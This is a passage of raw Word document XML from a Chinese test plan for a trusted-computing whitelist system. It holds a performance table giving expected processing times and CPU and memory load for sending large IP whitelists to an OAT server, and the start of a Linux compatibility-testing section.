            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E949EDD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="769F3C67" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>一次性发送50笔白名单，每笔1万条。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2768" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55DD3D7E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="710E16FA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="449472C6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="412" w:name="_Toc227386352"/>
      <w:bookmarkStart w:id="413" w:name="_Toc223510692"/>
      <w:bookmarkStart w:id="414" w:name="_Toc227386495"/>
      <w:bookmarkStart w:id="415" w:name="_Toc224357955"/>
      <w:bookmarkStart w:id="416" w:name="_Toc36487987"/>
      <w:bookmarkStart w:id="417" w:name="_Toc36573255"/>
      <w:bookmarkStart w:id="418" w:name="_Toc36630341"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试数据需求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="412"/>
      <w:bookmarkEnd w:id="413"/>
      <w:bookmarkEnd w:id="414"/>
      <w:bookmarkEnd w:id="415"/>
      <w:bookmarkEnd w:id="416"/>
      <w:bookmarkEnd w:id="417"/>
      <w:bookmarkEnd w:id="418"/>
    </w:p>
    <w:p w14:paraId="0E03FCCF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>使用脚本生成，不同IP地址的白名单，以供使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0653BC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="419" w:name="_Toc223510693"/>
      <w:bookmarkStart w:id="420" w:name="_Toc227386496"/>
      <w:bookmarkStart w:id="421" w:name="_Toc227386353"/>
      <w:bookmarkStart w:id="422" w:name="_Toc224357956"/>
      <w:bookmarkStart w:id="423" w:name="_Toc36487988"/>
      <w:bookmarkStart w:id="424" w:name="_Toc36573256"/>
      <w:bookmarkStart w:id="425" w:name="_Toc36630342"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>性能测试结果分析方法和预期</w:t>
      </w:r>
      <w:bookmarkEnd w:id="419"/>
      <w:bookmarkEnd w:id="420"/>
      <w:bookmarkEnd w:id="421"/>
      <w:bookmarkEnd w:id="422"/>
      <w:bookmarkEnd w:id="423"/>
      <w:bookmarkEnd w:id="424"/>
      <w:bookmarkEnd w:id="4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3"/>
        <w:gridCol w:w="2189"/>
        <w:gridCol w:w="2051"/>
        <w:gridCol w:w="2099"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="4F05F14A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="484"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1933" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FC73886" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>场景</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48D055BB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>执行策略</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B75B3E2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>处理时间 /秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D82D3D8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>系统占用  %</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="4CBB6EF0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1089"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1933" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32068C69" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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启动OAT服务器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2189" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40455A88" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>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一次性向OAT发送10万条白名单。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FAEEAB3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="Style2"/>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 xml:space="preserve">10秒 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="346E9FF5"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CPU：30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12FB460F"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内存：30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="3B77E4BF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1089"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1933" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D9BBD96" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2189" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AC4F982" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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一次性向OAT发送20万条白名单。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21A4DE26" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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20秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CEB1D43"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CPU：40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72CE7BC9"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内存：40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="766FD629" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="6BDA690B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1089"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1933" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="018F44FD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2189" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="705649F7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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一次性向OAT发送50万条白名单。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39608171" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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30秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4652A30B"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CPU：50</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B45B269"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内存：50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="5D8156A4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1089"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1933" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34FCB16D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="center"/>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szCs w:val="22"/>
              </w:rPr>
              <w:t>启动OAT服务器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2189" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D2F61C3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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一次性发送10笔白名单，每笔1万条。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DC65465" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="Style2"/>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10秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CA0AFBC"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CPU：30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B82A1AD"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内存：30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="62638B82" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1089"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1933" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45E5C7E4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2189" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B324867" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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一次性发送20笔白名单，每笔1万条。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73105156" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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20秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="540D39BE"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CPU：40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A6CFE46"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内存：40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="75F88F60" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1089"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1933" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FEBF064" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2189" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3971F0F7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>一次性发送50笔白名单，每笔1万条。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6335F5E4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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30秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28271494"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CPU：50</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E4D490E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>内存：50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BA1484A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>详见：持续免疫系统测试用例表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555F26CF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="426" w:name="_Toc36487989"/>
      <w:bookmarkStart w:id="427" w:name="_Toc36573257"/>
      <w:bookmarkStart w:id="428" w:name="_Toc36630343"/>
      <w:r w:rsidRPr="0020259A">
        <w:lastRenderedPageBreak/>
        <w:t>兼容性测试</w:t>
      </w:r>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方案</w:t>
      </w:r>
      <w:bookmarkEnd w:id="426"/>
      <w:bookmarkEnd w:id="427"/>
      <w:bookmarkEnd w:id="428"/>
    </w:p>
    <w:p w14:paraId="3E60AA91" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="429" w:name="_Toc36487990"/>
      <w:bookmarkStart w:id="430" w:name="_Toc36573258"/>
      <w:bookmarkStart w:id="431" w:name="_Toc36630344"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>场景名称：Linux系统支持</w:t>
      </w:r>
      <w:bookmarkEnd w:id="429"/>
      <w:bookmarkEnd w:id="430"/>
      <w:bookmarkEnd w:id="431"/>
    </w:p>
    <w:p w14:paraId="1D7C4E93" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="432" w:name="_Toc36487991"/>
      <w:bookmarkStart w:id="433" w:name="_Toc36573259"/>
      <w:bookmarkStart w:id="434" w:name="_Toc36630345"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>场景概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="432"/>
      <w:bookmarkEnd w:id="433"/>
      <w:bookmarkEnd w:id="434"/>
    </w:p>
    <w:p w14:paraId="44DF2555" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可信计算目前主要对Linux系统进行保护，目前国内外用户，Linux版本较多，差异性比较大，需要进行兼容性测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA8161B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="435" w:name="_Toc36487992"/>
      <w:bookmarkStart w:id="436" w:name="_Toc36573260"/>
      <w:bookmarkStart w:id="437" w:name="_Toc36630346"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行策略设计</w:t>
      </w:r>
      <w:bookmarkEnd w:id="435"/>
      <w:bookmarkEnd w:id="436"/>
